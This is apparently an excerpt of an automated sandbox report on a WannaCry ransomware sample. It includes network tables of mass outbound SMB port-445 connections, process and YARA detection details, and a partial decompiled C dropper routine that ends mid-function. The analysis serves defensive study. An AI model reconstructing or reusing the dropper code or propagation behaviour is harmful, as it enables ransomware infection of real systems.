Apr 29, 2023 00:54:24.956043005 CEST	53175	445	192.168.2.4	49.20.10.202
Apr 29, 2023 00:54:25.064583063 CEST	53178	445	192.168.2.4	39.61.243.166
Apr 29, 2023 00:54:25.064815998 CEST	53179	445	192.168.2.4	115.59.87.156
Apr 29, 2023 00:54:25.065541029 CEST	53180	445	192.168.2.4	219.200.6.64
Apr 29, 2023 00:54:25.106597900 CEST	53181	445	192.168.2.4	17.173.139.103
Apr 29, 2023 00:54:25.106972933 CEST	53182	445	192.168.2.4	84.190.197.171
Apr 29, 2023 00:54:25.173880100 CEST	53184	445	192.168.2.4	34.127.248.55
Apr 29, 2023 00:54:25.174809933 CEST	53185	445	192.168.2.4	98.157.108.97
Apr 29, 2023 00:54:25.892174006 CEST	53194	445	192.168.2.4	82.3.98.147
Apr 29, 2023 00:54:25.892203093 CEST	53193	445	192.168.2.4	208.61.177.153
Apr 29, 2023 00:54:25.892405033 CEST	53196	445	192.168.2.4	83.106.217.113
Apr 29, 2023 00:54:25.892407894 CEST	53195	445	192.168.2.4	158.231.2.221
Apr 29, 2023 00:54:25.923540115 CEST	53202	445	192.168.2.4	183.111.251.146
Apr 29, 2023 00:54:25.923541069 CEST	53201	445	192.168.2.4	8.141.136.28
Apr 29, 2023 00:54:25.923707962 CEST	53203	445	192.168.2.4	191.180.95.135
Apr 29, 2023 00:54:25.924093008 CEST	53207	445	192.168.2.4	113.72.105.29
Apr 29, 2023 00:54:25.924114943 CEST	53208	445	192.168.2.4	20.209.120.126
Apr 29, 2023 00:54:25.924343109 CEST	53209	445	192.168.2.4	67.91.246.204
Apr 29, 2023 00:54:25.924352884 CEST	53210	445	192.168.2.4	14.240.235.193
Apr 29, 2023 00:54:25.924606085 CEST	53212	445	192.168.2.4	195.240.170.13
Apr 29, 2023 00:54:25.925051928 CEST	53216	445	192.168.2.4	137.108.91.171
Apr 29, 2023 00:54:25.925051928 CEST	53217	445	192.168.2.4	199.187.238.75
Apr 29, 2023 00:54:25.925328016 CEST	53219	445	192.168.2.4	155.76.29.116
Apr 29, 2023 00:54:25.925409079 CEST	53220	445	192.168.2.4	12.63.188.123
Apr 29, 2023 00:54:25.925628901 CEST	53222	445	192.168.2.4	141.45.231.57
Apr 29, 2023 00:54:25.925697088 CEST	53223	445	192.168.2.4	148.220.108.243
Apr 29, 2023 00:54:25.925839901 CEST	53224	445	192.168.2.4	59.214.82.36
Apr 29, 2023 00:54:25.926081896 CEST	53227	445	192.168.2.4	210.128.200.99
Apr 29, 2023 00:54:26.064764977 CEST	53231	445	192.168.2.4	82.100.29.234
Apr 29, 2023 00:54:26.064764977 CEST	53232	445	192.168.2.4	192.23.176.59
Apr 29, 2023 00:54:26.065066099 CEST	53233	445	192.168.2.4	19.44.229.246
Apr 29, 2023 00:54:26.065442085 CEST	53234	445	192.168.2.4	15.161.21.111
Apr 29, 2023 00:54:26.065624952 CEST	53235	445	192.168.2.4	143.125.22.232
Apr 29, 2023 00:54:26.174319983 CEST	53238	445	192.168.2.4	52.101.22.143
Apr 29, 2023 00:54:26.175168991 CEST	53239	445	192.168.2.4	142.103.190.36
Apr 29, 2023 00:54:26.176301003 CEST	53240	445	192.168.2.4	75.117.177.202
Apr 29, 2023 00:54:26.220666885 CEST	53242	445	192.168.2.4	27.180.158.103
Apr 29, 2023 00:54:26.220952034 CEST	53241	445	192.168.2.4	57.0.136.183
Apr 29, 2023 00:54:26.283456087 CEST	53244	445	192.168.2.4	211.1.227.11
Apr 29, 2023 00:54:26.284089088 CEST	53245	445	192.168.2.4	78.200.243.237
Apr 29, 2023 00:54:27.017080069 CEST	53254	445	192.168.2.4	117.64.104.136
Apr 29, 2023 00:54:27.017528057 CEST	53255	445	192.168.2.4	61.139.66.88
Apr 29, 2023 00:54:27.017755985 CEST	53256	445	192.168.2.4	87.102.185.125
Apr 29, 2023 00:54:27.018050909 CEST	53257	445	192.168.2.4	140.22.80.234
Apr 29, 2023 00:54:27.048849106 CEST	53262	445	192.168.2.4	37.12.158.58
Apr 29, 2023 00:54:27.049052000 CEST	53263	445	192.168.2.4	198.113.15.174
Apr 29, 2023 00:54:27.049154997 CEST	53264	445	192.168.2.4	164.5.78.61
Apr 29, 2023 00:54:27.049560070 CEST	53268	445	192.168.2.4	193.231.51.222
Apr 29, 2023 00:54:27.049649000 CEST	53269	445	192.168.2.4	82.52.5.96
Apr 29, 2023 00:54:27.049793959 CEST	53270	445	192.168.2.4	160.35.120.162
Apr 29, 2023 00:54:27.049961090 CEST	53271	445	192.168.2.4	196.143.53.162
Apr 29, 2023 00:54:27.050211906 CEST	53273	445	192.168.2.4	203.211.187.55
Apr 29, 2023 00:54:27.050628901 CEST	53277	445	192.168.2.4	203.5.28.194
Apr 29, 2023 00:54:27.050860882 CEST	53278	445	192.168.2.4	88.205.148.75
Apr 29, 2023 00:54:27.051245928 CEST	53280	445	192.168.2.4	21.27.34.108
Apr 29, 2023 00:54:27.051512957 CEST	53281	445	192.168.2.4	198.17.150.85
Apr 29, 2023 00:54:27.051949024 CEST	53283	445	192.168.2.4	26.150.214.189
Apr 29, 2023 00:54:27.052272081 CEST	53284	445	192.168.2.4	155.207.10.75
Apr 29, 2023 00:54:27.052453041 CEST	53285	445	192.168.2.4	139.137.15.139
Apr 29, 2023 00:54:27.053165913 CEST	53288	445	192.168.2.4	48.188.15.215
Apr 29, 2023 00:54:27.093372107 CEST	445	53269	82.52.5.96	192.168.2.4
Apr 29, 2023 00:54:27.189606905 CEST	53291	445	192.168.2.4	139.97.251.176
Apr 29, 2023 00:54:27.189606905 CEST	53293	445	192.168.2.4	217.116.30.231
Apr 29, 2023 00:54:27.189706087 CEST	53294	445	192.168.2.4	35.162.105.18
Apr 29, 2023 00:54:27.189964056 CEST	53295	445	192.168.2.4	102.209.200.134
Apr 29, 2023 00:54:27.189966917 CEST	53296	445	192.168.2.4	130.59.41.150
Apr 29, 2023 00:54:27.299365997 CEST	53299	445	192.168.2.4	178.157.100.67
Apr 29, 2023 00:54:27.299763918 CEST	53300	445	192.168.2.4	114.254.254.12
Apr 29, 2023 00:54:27.300707102 CEST	53301	445	192.168.2.4	70.106.244.33
Apr 29, 2023 00:54:27.345849037 CEST	53303	445	192.168.2.4	64.161.216.15
Apr 29, 2023 00:54:27.345850945 CEST	53302	445	192.168.2.4	35.162.140.188
Apr 29, 2023 00:54:27.441123962 CEST	53306	445	192.168.2.4	75.69.129.14
Apr 29, 2023 00:54:27.441479921 CEST	53307	445	192.168.2.4	101.229.210.20
Apr 29, 2023 00:54:27.594952106 CEST	53269	445	192.168.2.4	82.52.5.96
Apr 29, 2023 00:54:27.638910055 CEST	445	53269	82.52.5.96	192.168.2.4
Apr 29, 2023 00:54:28.126631975 CEST	53315	445	192.168.2.4	124.2.133.64
Apr 29, 2023 00:54:28.127240896 CEST	53318	445	192.168.2.4	197.69.65.45
Apr 29, 2023 00:54:28.127310991 CEST	53319	445	192.168.2.4	12.135.237.63
Apr 29, 2023 00:54:28.127496004 CEST	53320	445	192.168.2.4	162.125.57.80
Apr 29, 2023 00:54:29.970628023 CEST	53324	445	192.168.2.4	16.214.191.211
Apr 29, 2023 00:54:29.970633030 CEST	53322	445	192.168.2.4	19.130.125.142
Apr 29, 2023 00:54:29.970777988 CEST	53325	445	192.168.2.4	190.189.244.47
Apr 29, 2023 00:54:29.971086979 CEST	53329	445	192.168.2.4	73.146.223.139
Apr 29, 2023 00:54:29.971088886 CEST	53330	445	192.168.2.4	157.21.136.138
Apr 29, 2023 00:54:29.971226931 CEST	53332	445	192.168.2.4	144.194.200.173
Apr 29, 2023 00:54:29.971591949 CEST	53334	445	192.168.2.4	222.176.140.136
Apr 29, 2023 00:54:29.971590996 CEST	53338	445	192.168.2.4	118.105.221.5
Apr 29, 2023 00:54:29.971769094 CEST	53331	445	192.168.2.4	205.254.221.160
Apr 29, 2023 00:54:29.971769094 CEST	53341	445	192.168.2.4	100.251.125.59
Apr 29, 2023 00:54:29.971771002 CEST	53339	445	192.168.2.4	53.25.144.252
Apr 29, 2023 00:54:29.971982956 CEST	53344	445	192.168.2.4	157.111.180.214
Apr 29, 2023 00:54:29.971986055 CEST	53342	445	192.168.2.4	194.109.254.93
Apr 29, 2023 00:54:29.972069979 CEST	53345	445	192.168.2.4	202.172.127.37
Apr 29, 2023 00:54:29.972316027 CEST	53346	445	192.168.2.4	94.97.128.145
Apr 29, 2023 00:54:29.972322941 CEST	53349	445	192.168.2.4	141.49.152.63
Apr 29, 2023 00:54:30.048969984 CEST	53351	445	192.168.2.4	57.169.168.98
Apr 29, 2023 00:54:30.050446033 CEST	53368	445	192.168.2.4	155.140.238.66
Apr 29, 2023 00:54:30.050451040 CEST	53366	445	192.168.2.4	54.145.222.76
Apr 29, 2023 00:54:30.050637960 CEST	53369	445	192.168.2.4	165.57.34.139
Apr 29, 2023 00:54:30.050640106 CEST	53370	445	192.168.2.4	4.72.44.73
Apr 29, 2023 00:54:30.050805092 CEST	53371	445	192.168.2.4	6.87.241.47
Apr 29, 2023 00:54:30.050844908 CEST	53372	445	192.168.2.4	181.244.248.182
Apr 29, 2023 00:54:30.051028013 CEST	53374	445	192.168.2.4	15.120.194.223
Apr 29, 2023 00:54:30.051033020 CEST	53373	445	192.168.2.4	211.182.23.108
Apr 29, 2023 00:54:30.051209927 CEST	53375	445	192.168.2.4	140.41.235.78
Apr 29, 2023 00:54:30.051214933 CEST	53376	445	192.168.2.4	76.175.238.228
Apr 29, 2023 00:54:30.051405907 CEST	53377	445	192.168.2.4	67.117.211.40
Apr 29, 2023 00:54:30.051404953 CEST	53378	445	192.168.2.4	145.135.222.113
Apr 29, 2023 00:54:30.051573992 CEST	53379	445	192.168.2.4	131.81.196.10
Apr 29, 2023 00:54:30.051688910 CEST	53380	445	192.168.2.4	11.83.30.93
Apr 29, 2023 00:54:30.054929018 CEST	53381	445	192.168.2.4	75.194.173.118
Apr 29, 2023 00:54:30.273461103 CEST	445	53376	76.175.238.228	192.168.2.4
Apr 29, 2023 00:54:30.782686949 CEST	53376	445	192.168.2.4	76.175.238.228
Apr 29, 2023 00:54:31.002619028 CEST	445	53376	76.175.238.228	192.168.2.4
Apr 29, 2023 00:54:31.095422983 CEST	53383	445	192.168.2.4	162.196.67.75
Apr 29, 2023 00:54:31.095532894 CEST	53384	445	192.168.2.4	180.185.229.130
Apr 29, 2023 00:54:31.095662117 CEST	53386	445	192.168.2.4	174.99.67.5
Apr 29, 2023 00:54:31.095702887 CEST	53387	445	192.168.2.4	171.96.1.245
Apr 29, 2023 00:54:31.095854998 CEST	53389	445	192.168.2.4	56.153.204.91
Apr 29, 2023 00:54:31.095916033 CEST	53390	445	192.168.2.4	136.166.23.206
Apr 29, 2023 00:54:31.096132040 CEST	53393	445	192.168.2.4	99.74.248.45
Apr 29, 2023 00:54:31.096235037 CEST	53395	445	192.168.2.4	104.43.43.96
Apr 29, 2023 00:54:31.096273899 CEST	53396	445	192.168.2.4	47.178.110.107
Apr 29, 2023 00:54:31.096549034 CEST	53401	445	192.168.2.4	159.238.109.242
Apr 29, 2023 00:54:31.096688032 CEST	53402	445	192.168.2.4	199.107.249.192
Apr 29, 2023 00:54:31.096688032 CEST	53403	445	192.168.2.4	100.238.48.221
Apr 29, 2023 00:54:31.096824884 CEST	53404	445	192.168.2.4	161.229.13.41
Apr 29, 2023 00:54:31.096965075 CEST	53407	445	192.168.2.4	222.91.163.36
Apr 29, 2023 00:54:31.097090960 CEST	53409	445	192.168.2.4	23.247.248.99
Apr 29, 2023 00:54:31.097281933 CEST	53412	445	192.168.2.4	142.10.100.88
Apr 29, 2023 00:54:31.173660040 CEST	53413	445	192.168.2.4	161.22.249.234
Apr 29, 2023 00:54:31.174678087 CEST	53428	445	192.168.2.4	194.57.146.252
Apr 29, 2023 00:54:31.174748898 CEST	53429	445	192.168.2.4	93.145.237.30
Apr 29, 2023 00:54:31.174863100 CEST	53431	445	192.168.2.4	179.186.152.46
Apr 29, 2023 00:54:31.174912930 CEST	53432	445	192.168.2.4	202.241.164.120
Apr 29, 2023 00:54:31.174978971 CEST	53433	445	192.168.2.4	142.225.94.152
Apr 29, 2023 00:54:31.175039053 CEST	53434	445	192.168.2.4	219.167.143.29
Apr 29, 2023 00:54:31.175106049 CEST	53435	445	192.168.2.4	35.249.121.55
Apr 29, 2023 00:54:31.175142050 CEST	53436	445	192.168.2.4	19.57.190.181
Apr 29, 2023 00:54:31.175251961 CEST	53438	445	192.168.2.4	15.61.219.100
Apr 29, 2023 00:54:31.175261974 CEST	53437	445	192.168.2.4	174.70.207.194
Apr 29, 2023 00:54:31.175334930 CEST	53439	445	192.168.2.4	18.23.166.195
Apr 29, 2023 00:54:31.175380945 CEST	53440	445	192.168.2.4	151.215.141.188
Apr 29, 2023 00:54:31.175434113 CEST	53441	445	192.168.2.4	106.56.40.240
Apr 29, 2023 00:54:31.175530910 CEST	53442	445	192.168.2.4	213.7.36.185
Apr 29, 2023 00:54:31.175538063 CEST	53443	445	192.168.2.4	219.248.191.88
Apr 29, 2023 00:54:31.208458900 CEST	445	53429	93.145.237.30	192.168.2.4
Apr 29, 2023 00:54:31.470113993 CEST	445	53432	202.241.164.120	192.168.2.4
Apr 29, 2023 00:54:31.720248938 CEST	53429	445	192.168.2.4	93.145.237.30
Apr 29, 2023 00:54:31.754395962 CEST	445	53429	93.145.237.30	192.168.2.4
Apr 29, 2023 00:54:31.985919952 CEST	53432	445	192.168.2.4	202.241.164.120
Apr 29, 2023 00:54:32.267174006 CEST	53429	445	192.168.2.4	93.145.237.30
Apr 29, 2023 00:54:32.282969952 CEST	445	53432	202.241.164.120	192.168.2.4
Apr 29, 2023 00:54:32.301848888 CEST	445	53429	93.145.237.30	192.168.2.4
Apr 29, 2023 00:54:32.798476934 CEST	53432	445	192.168.2.4	202.241.164.120
Apr 29, 2023 00:54:33.097048044 CEST	445	53432	202.241.164.120	192.168.2.4
Apr 29, 2023 00:54:34.111064911 CEST	53384	445	192.168.2.4	180.185.229.130
Apr 29, 2023 00:54:34.111087084 CEST	53383	445	192.168.2.4	162.196.67.75
Apr 29, 2023 00:54:34.111100912 CEST	53389	445	192.168.2.4	56.153.204.91
Apr 29, 2023 00:54:34.111100912 CEST	53393	445	192.168.2.4	99.74.248.45
Apr 29, 2023 00:54:34.111100912 CEST	53395	445	192.168.2.4	104.43.43.96
Apr 29, 2023 00:54:34.111108065 CEST	53386	445	192.168.2.4	174.99.67.5
Apr 29, 2023 00:54:34.111105919 CEST	53404	445	192.168.2.4	161.229.13.41
Apr 29, 2023 00:54:34.111109018 CEST	53390	445	192.168.2.4	136.166.23.206
Apr 29, 2023 00:54:34.111113071 CEST	53387	445	192.168.2.4	171.96.1.245
Apr 29, 2023 00:54:34.111126900 CEST	53403	445	192.168.2.4	100.238.48.221
Apr 29, 2023 00:54:34.111129045 CEST	53412	445	192.168.2.4	142.10.100.88
Apr 29, 2023 00:54:34.111128092 CEST	53409	445	192.168.2.4	23.247.248.99
Apr 29, 2023 00:54:34.111130953 CEST	53407	445	192.168.2.4	222.91.163.36
Apr 29, 2023 00:54:34.111139059 CEST	53396	445	192.168.2.4	47.178.110.107
Apr 29, 2023 00:54:34.111152887 CEST	53402	445	192.168.2.4	199.107.249.192
Apr 29, 2023 00:54:34.111152887 CEST	53401	445	192.168.2.4	159.238.109.242
Apr 29, 2023 00:54:34.173635006 CEST	53442	445	192.168.2.4	213.7.36.185
Apr 29, 2023 00:54:34.173640013 CEST	53428	445	192.168.2.4	194.57.146.252
Apr 29, 2023 00:54:34.173695087 CEST	53413	445	192.168.2.4	161.22.249.234
Apr 29, 2023 00:54:34.173695087 CEST	53440	445	192.168.2.4	151.215.141.188
Apr 29, 2023 00:54:34.175498962 CEST	53438	445	192.168.2.4	15.61.219.100
Apr 29, 2023 00:54:34.189218044 CEST	53433	445	192.168.2.4	142.225.94.152
Apr 29, 2023 00:54:34.189241886 CEST	53434	445	192.168.2.4	219.167.143.29
Apr 29, 2023 00:54:34.189259052 CEST	53441	445	192.168.2.4	106.56.40.240
Apr 29, 2023 00:54:34.189241886 CEST	53439	445	192.168.2.4	18.23.166.195
Apr 29, 2023 00:54:34.189264059 CEST	53435	445	192.168.2.4	35.249.121.55
Apr 29, 2023 00:54:34.189243078 CEST	53443	445	192.168.2.4	219.248.191.88
Apr 29, 2023 00:54:34.189271927 CEST	53431	445	192.168.2.4	179.186.152.46
Apr 29, 2023 00:54:34.189896107 CEST	53437	445	192.168.2.4	174.70.207.194
Apr 29, 2023 00:54:34.189904928 CEST	53436	445	192.168.2.4	19.57.190.181

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2023 00:53:12.344654083 CEST	138	138	192.168.2.4	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 29, 2023 00:52:43.416512966 CEST	146.247.191.181	192.168.2.4	2537	(Time to live exceeded in transit)	Time Exceeded
Apr 29, 2023 00:52:50.153769970 CEST	78.149.120.118	192.168.2.4	86d1	(Unknown)	Destination Unreachable
Apr 29, 2023 00:52:50.403551102 CEST	113.196.129.81	192.168.2.4	b2de	(Unknown)	Destination Unreachable
Apr 29, 2023 00:52:53.244436979 CEST	70.191.61.97	192.168.2.4	36a5	(Time to live exceeded in transit)	Time Exceeded
Apr 29, 2023 00:52:55.573494911 CEST	170.238.235.5	192.168.2.4	5e1a	(Unknown)	Destination Unreachable
Apr 29, 2023 00:52:59.812283039 CEST	72.171.20.57	192.168.2.4	9ebe	(Net unreachable)	Destination Unreachable
Apr 29, 2023 00:53:04.326322079 CEST	43.241.28.74	192.168.2.4	7bc7	(Time to live exceeded in transit)	Time Exceeded
Apr 29, 2023 00:53:13.359616995 CEST	197.211.32.149	192.168.2.4	91b0	(Time to live exceeded in transit)	Time Exceeded
Apr 29, 2023 00:53:16.022006035 CEST	83.235.188.51	192.168.2.4	cff0	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:18.577264071 CEST	14.250.150.105	192.168.2.4	6535	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:19.818840027 CEST	149.11.89.129	192.168.2.4	951a	(Net unreachable)	Destination Unreachable
Apr 29, 2023 00:53:20.132342100 CEST	76.167.28.246	192.168.2.4	1b3c	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:21.965720892 CEST	94.218.158.27	192.168.2.4	4fe8	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:27.814277887 CEST	153.92.2.245	192.168.2.4	7ac3	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:29.662126064 CEST	37.119.159.194	192.168.2.4	a0fe	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:30.775309086 CEST	104.206.4.11	192.168.2.4	2ca2	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:30.870527983 CEST	79.250.21.131	192.168.2.4	9ed	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:31.563472033 CEST	168.227.24.6	192.168.2.4	1f6e	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:33.107814074 CEST	84.182.180.108	192.168.2.4	d74a	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:36.831338882 CEST	79.217.165.185	192.168.2.4	dcc5	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:42.254892111 CEST	197.211.32.243	192.168.2.4	671e	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:47.478616953 CEST	103.29.66.36	192.168.2.4	3d5	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:48.345290899 CEST	211.12.53.66	192.168.2.4	6765	(Net unreachable)	Destination Unreachable
Apr 29, 2023 00:53:48.665370941 CEST	85.175.64.86	192.168.2.4	94a7	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:55.235975027 CEST	85.16.72.110	192.168.2.4	1129	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:56.287412882 CEST	104.167.185.2	192.168.2.4	e1ab	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:53:57.949768066 CEST	2.203.241.106	192.168.2.4	88a	(Unknown)	Destination Unreachable
Apr 29, 2023 00:53:59.329487085 CEST	211.12.53.66	192.168.2.4	98e6	(Net unreachable)	Destination Unreachable
Apr 29, 2023 00:53:59.544825077 CEST	179.190.61.106	192.168.2.4	cad8	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:54:06.080290079 CEST	185.61.164.173	192.168.2.4	5f15	(Time to live exceeded in transit)	Time Exceeded
Apr 29, 2023 00:54:07.995075941 CEST	79.196.174.189	192.168.2.4	39ea	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:10.244672060 CEST	46.45.108.37	192.168.2.4	38c4	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:54:12.404727936 CEST	191.53.104.2	192.168.2.4	e8b8	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:54:12.509047031 CEST	77.1.56.131	192.168.2.4	584a	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:14.860821009 CEST	80.5.160.234	192.168.2.4	81c8	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:14.861789942 CEST	91.10.175.169	192.168.2.4	ff46	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:14.876964092 CEST	218.248.59.213	192.168.2.4	a4bf	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:17.101665974 CEST	65.158.157.174	192.168.2.4	4d09	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:17.152563095 CEST	149.14.159.114	192.168.2.4	c43f	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:18.995737076 CEST	50.235.102.70	192.168.2.4	5957	(Host unreachable)	Destination Unreachable
Apr 29, 2023 00:54:20.653124094 CEST	110.174.145.146	192.168.2.4	ec68	(Net unreachable)	Destination Unreachable
Apr 29, 2023 00:54:23.672394037 CEST	94.222.109.77	192.168.2.4	84b6	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:25.134639978 CEST	84.190.197.171	192.168.2.4	4f83	(Unknown)	Destination Unreachable
Apr 29, 2023 00:54:27.378176928 CEST	111.69.58.204	192.168.2.4	a79a	(Net unreachable)	Destination Unreachable
Apr 29, 2023 00:54:31.831557989 CEST	4.34.67.110	192.168.2.4	c82d	(Time to live exceeded in transit)	Time Exceeded
Apr 29, 2023 00:54:34.249883890 CEST	208.184.166.134	192.168.2.4	cd95	(Unknown)	Destination Unreachable

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: onq54JS79W.exePID: 3644, Parent PID: 3528

General

Target ID:	0
Start time:	00:52:23
Start date:	29/04/2023
Path:	C:\Users\user\Desktop\onq54JS79W.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\onq54JS79W.exe
Imagebase:	0x400000
File size:	3751936 bytes
MD5 hash:	A55D4ECD3EE9A6623C987BDAE88293D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.313347058.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: onq54JS79W.exePID: 6948, Parent PID: 576

General

Target ID:	1
Start time:	00:52:23
Start date:	29/04/2023
Path:	C:\Users\user\Desktop\onq54JS79W.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\onq54JS79W.exe -m security
Imagebase:	0x400000
File size:	3751936 bytes
MD5 hash:	A55D4ECD3EE9A6623C987BDAE88293D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.314578330.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: tasksche.exePID: 4608, Parent PID: 3644

General

Target ID:	2
Start time:	00:52:24
Start date:	29/04/2023
Path:	C:\Windows\tasksche.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\tasksche.exe /i
Imagebase:	0x400000
File size:	3514368 bytes
MD5 hash:	7F7CCAA16FB15EB1C7399D422F8363E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.316611005.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (Nextron Systems) (with the help of binar.ly) Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 98%, ReversingLabs Detection: 91%, Virustotal, Browse
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: onq54JS79W.exePID: 3644, Parent PID: 3528COMMON

Executed Functions

Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
libraryloaderfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x7476f7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x7476fc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
